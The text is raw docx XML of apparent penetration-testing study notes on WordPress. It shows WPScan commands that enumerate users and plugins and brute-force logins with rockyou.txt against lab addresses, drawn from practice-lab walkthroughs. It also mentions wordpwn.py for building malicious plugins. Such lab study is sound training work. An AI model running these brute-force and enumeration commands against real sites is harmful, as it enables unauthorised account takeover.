          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Actively enumerate user accounts ("u" flag stands for users)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D15">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan –url http://192.168.43.43/ --enumerate u1-20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Faster alternative to the one above, but it does have a more limited scope</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Only tries to enumerate users with IDs from 1 to 20 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D18">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1955800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="39" name="image41.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image41.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId950"/>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D19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="269"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As seen in this output, we have found 3 users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D1B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan --url http://192.168.50.244 --enumerate p --plugins-detection aggressive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1468"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The special part of this is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--enumerate p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D1D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1468"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Which means enumerate all popular plugins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1468"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This scan was seen in the XXXXXXXXX 27.1.2. WEBSRV1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D20">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_muatjrcreb7a" w:id="396"/>
      <w:bookmarkEnd w:id="396"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using WPScan to bruteforce usernames and passwords in WordPress</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D21">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D22">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId951">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ColdBoxEasy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PG Play) (</w:t>
      </w:r>
      <w:hyperlink r:id="rId952">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D23">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D24">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Earlier in the writeup, we found a user named hugo on wordpress, and the website said that his password was changed, so that was a potential clue to bruteforce it, so using WPScan, we can bruteforce passwords using the rockyou.txt list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D25">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D26">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan --url http://10.10.10.10/ --usernames hugo --passwords /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="801"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute force passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D28">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="250"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2400300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="524" name="image515.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image515.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId953"/>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2D2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="250"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output with the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we later did this to the user c0ldd, who is the admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D2D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D2E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan --url http://192.168.43.146/ --usernames </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">username.txt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--passwords </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also add a username list as well for brute forcing usernames, and here I also specified password list but you don't have to </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also replace "--usernames" with "-U" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="576"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also replace "--passwords" with "-P"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D32">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D33">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D34">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan --url http://192.168.120.50 -t 40 -e u1-1000 --passwords /usr/share/wordlists/rockyou.txt --force</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one bruteforces usernames (user ID from 1 to 1000) and the rockyou list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you scroll up to the top of the WordPress section, I already showed this command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2794000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="319" name="image310.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image310.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId95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2D38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1083"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From here, you can see it worked since it found the credentials admin:admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D39">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7i97apvbz1u0" w:id="397"/>
      <w:bookmarkEnd w:id="397"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using WPScan to find vulnerable plugins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D3A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D3B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId955">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">wordpwn.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool I've seen being used to create malicious plugins using msfvenom but you can probably just make them manually</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D3C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1188"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, this does use a meterpeter shell, which has limited usage in XXXXXXXXX</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D3D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D3E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (27.1.2. WEBSRV1):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D3F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D40">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WordPress themes and plugins are written by the community and many vulnerabilities are improperly patched or are simply never fixed at all. This makes plugins and themes a great target for compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D41">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's perform a scan on these components with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WPScan</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
